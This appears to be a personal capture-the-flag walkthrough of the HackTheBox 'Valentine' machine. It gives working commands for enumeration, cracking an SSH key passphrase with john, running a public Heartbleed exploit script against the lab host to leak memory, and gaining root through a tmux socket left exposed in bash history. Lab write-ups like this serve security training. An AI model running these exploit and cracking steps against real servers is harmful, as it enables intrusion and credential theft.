Practice
  • 🛤️TryHackMe Rooms
    • HackersVsHackers
    • Vulnnet - The End Game
    • Surfer
    • Corridor
    • Mustacchio
    • Wordpress: CVE-2021-29447
    • Bounty Hacker
    • Simple CTF
    • Agent Sudo
    • Lazy Admin
    • Ignite
    • Brooklynn 99
    • c4ptur3th3fl4g
    • Lian_Yu
    • Rabbit
    • Gallery
    • Overpass
    • Team
    • Easy Peasy
    • CmesS
    • Ultratech
    • Wonderland
    • Anonymous
    • GamingServer
    • Tomghost
    • ConvertMyVideo
    • DogCat
    • Blog
    • Git Happens
    • 0day
    • Road
    • Inferno
    • Opacity
    • Market Place
    • Valley CTF
    • Weasel
    • SafeZone
    • Blueprint
    • Fusion Corp
    • Quotient
    • Unbaked Pie
    • Kenobi
    • Steel Mountain
    • Alfred
    • Hack Park
    • Game Zone
    • Daily Bugle
    • Retro
    • Corp
    • Attacktive Directory
    • Vulnnet - Roasted
    • Vulnnet - Active
    • Vulnnet - Internal
    • Enterprise - Hard
    • Iron Corp - Hard
    • Ra - Hard
    • For Business Reasons
  • 📦HackTheBox
    • Linux Boxes
      • Lame
      • Shocker
      • Nibbles
      • Beep
      • Cronos
      • Nineveh
      • Sense
      • Solidstate
      • Node
      • Valentine
      • Poison
      • Sunday
      • Irked
      • FriendZone
      • Networked
      • Jarvis
      • Tabby
      • Mirai
      • Popcorn
    • Windows Boxes
      • Active
      • Forest
      • ChatterBox
      • Resolute
      • Intelligence
  • 🤖CTF's
    • CloudSEK CTFs
    • ACM Cyber - UCLA
  • ¯\_(ツ)_/¯
    • Interview Topics
  • 🪣BOF - OSCP
    • Basics
    • Spiking
    • FUZZing
    • Finding the Offset
    • Overwriting the EIP
    • Finding BAD Characters
    • Finding RIGHT Module
    • Generating Shellcode
  • 📛Active Directory
    • Basics
      • Managing AD Users
      • Managing AD Computers
      • Group Policies
      • Authentication Methods
      • Trees, Forests and Trusts
    • Enumeration Techniques
    • Initial Attack Vectors
    • Post Compromise Enumeration
    • Post Compromise Attacks
      • Token Impersonation - LM
      • Kerberoasting
      • cPassword / GPP Attack
      • URL File Attacks
      • PrintNightmare
      • Golden Ticket Attacks
      • ZeroLogon Attacks
    • Lateral Movement and Pivoting
      • File Transfers
      • Spawning Processes Remotely
      • Moving Laterally with WMI
      • Alternate Authentication Material
      • Abusing User's Behaviour
      • Port Forwarding
      • Maintaing Access
      • Pivoting
      • Cleaning Up
    • Other Resources
  • 🛡️Powershell Basics
    • Getting Started
      • Functions
  • 😁Others
    • API Security
    • Cloud Security
  • Enumeration
    • Local PrivEsc
    • Remoting
    • Persistence
    • Kerberos
Powered by GitBook
On this page
  • Scanning
  • HTTP Enumeration
  • Privilege Escalation
  1. HackTheBox
  2. Linux Boxes

Valentine

Abusing SSL HeartBleed vulnerability - SSH Trouble Shooting - SUID Socket PrivEsc via tmux

PreviousNodeNextPoison

Last updated 1 year ago

Scanning

HTTP Enumeration

Viewing the source dint give me anything nor robots.txt file 

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.79

Viewing the /dev gives two important files, the encode and decode endpoints are just scripts run by the backend - Tried command injections there, but nothing worked :(

The hype_key is a hex encoded string

Changing the permissions and tried logging via ssh

chmod 400 hype_key
ssh -i hype_key hype@valentine.htb
hype_key's passphrase:

So now we need to figure the passphrase for this we can use ssh2john utility !

ssh2john hype_key > out
john out --wordlist=/opt/rockyou.txt
. . . . .

Nothing useful, john couldn't crack - BACK TO ENUMERATION :(

nmap --script vuln -oA vuln-scan 10.10.10.79

It is essentially a vulnerability in the popular OpenSSL cryptographic software library. This vulnerability allows anyone on the Internet to read the memory of the systems protected by this vulnerable version of OpenSSL. This can lead to the compromise of secret keys, passwords, information, etc. It also allows attackers to eavesdrop on communications.

Inorder to exploit this we can use this script

git clone https://gist.github.com/10174134.git

Let’s run the exploit with a loop number of 10

python heartbleed.py -p 443 -n 10 10.10.10.79

We get a base64 encoded string, when we decode it - we have the passphrase !

echo "aGVhcn.........." | base64 -d
heartbleedbeleievethehype

We can now log on to the box using ssh

ssh -i hype_key hype@10.10.10.79
Enter passphrase for key 'hype_key':
sign_and_send_pubkey: no mutual signature supported

Encountered this error and spent some time fixing this - the fix is 

ssh -o -o PubkeyAcceptedKeyTypes=+ssh-rsa -i hype_key hype@10.10.10.79

Privilege Escalation

Checked the .bash_history because it wasn't linked to /dev/null

ls -la /
cd .devs
ls -l dev_sess
tmux -S /.devs/dev_sess
exit

The file dev_sess was a socket file and it had a SUID bit to it - When we attached the socket process via tmux - We become root !

Let’s use an to convert it to text - We find out that it is an RSA private key!

📦
online tool